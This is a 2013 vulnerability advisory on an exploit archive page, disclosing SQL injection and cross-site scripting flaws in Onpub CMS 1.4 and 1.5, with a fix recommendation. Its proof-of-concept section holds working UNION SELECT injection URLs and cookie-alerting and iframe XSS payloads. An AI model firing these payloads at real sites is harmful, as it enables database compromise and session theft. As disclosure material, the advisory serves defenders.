exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Onpub CMS 1.4 / 1.5 SQL Injection

Onpub CMS 1.4 / 1.5 SQL Injection
Posted Oct 25, 2013
Authored by Benjamin Kunz Mejri, Marcel Bernhardt, Vulnerability Laboratory | Site vulnerability-lab.com

Onpub CMS versions 1.4 and 1.5 suffer from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 29be76c26f70a0a77e21ebbba24a61a7fc1665dd3abf256dbbaa9777f05ae7cf

Onpub CMS 1.4 / 1.5 SQL Injection

Change Mirror Download
Document Title:
===============
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1120


Release Date:
=============
2013-10-26


Vulnerability Laboratory ID (VL-ID):
====================================
1120


Common Vulnerability Scoring System:
====================================
8.2


Product & Service Introduction:
===============================
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub`s default
design and functionality via open-standard web development tools and techniques.

Onpub is ideal for those with no desire to implement a CMS from scratch, but still need a custom, yet agile solution.
Onpub tightly integrates many widely used third-party web apps and scripts in to one coherent system to build further upon.

( Copy of the Vendor Homepage: http://onpub.com/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Onpub
Product: Onpub - Content Management System 1.4 Lite and 1.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
Multiple remote sql injection web vulnerabilities are detected in the official in the Onpub v1.4 and 1.5 Content Management System web-application.
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.

The sql injection vulnerabilities are located in the `websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of the index.php file.
Remote attackers are able to inject own sql commands via GET method request to compromise the database management system or cms web-application.
The inject can be done by usage of the manage path via GET method request or by usage of the articleID in the index.php file POST method request.
The severity of the remote sql injection bugs is estimated as critical.

Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID



2.1
A client-side post inject web vulnerability is detected in the official in the Onpub v1.4 and v1.5 Content Management System web-application.
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).

The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
Remote attackers can manipulate the `page` parameter in the `index.php` file via GET method request to compromise client-side application context.

Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
client-side unauthorized external redirects and client-side manipulation of the contact formular module context.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page



Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction.
For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]


onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--





2.1
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account
and with low user interaction click. For demonstration or to reproduce ...


PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>


Solution - Fix & Patch:
=======================
1.1
Parse in the index.php file the vulnerable `websiteID`,`imageID`,`keywords`,`articleID`,`orderBy`,`order` parameters.
Use the mysql_real_escape_string() or a prepared statement to prevent sql injection attacks.

2.1
Parse or encode the vulnerable page parameter in the index.php file to prevent client-side cross site scripting attacks.


Security Risk:
==============
1.1
The security risk of the remote sql injection web vulnerabilities are estimated as critical.

1.2
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]




--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close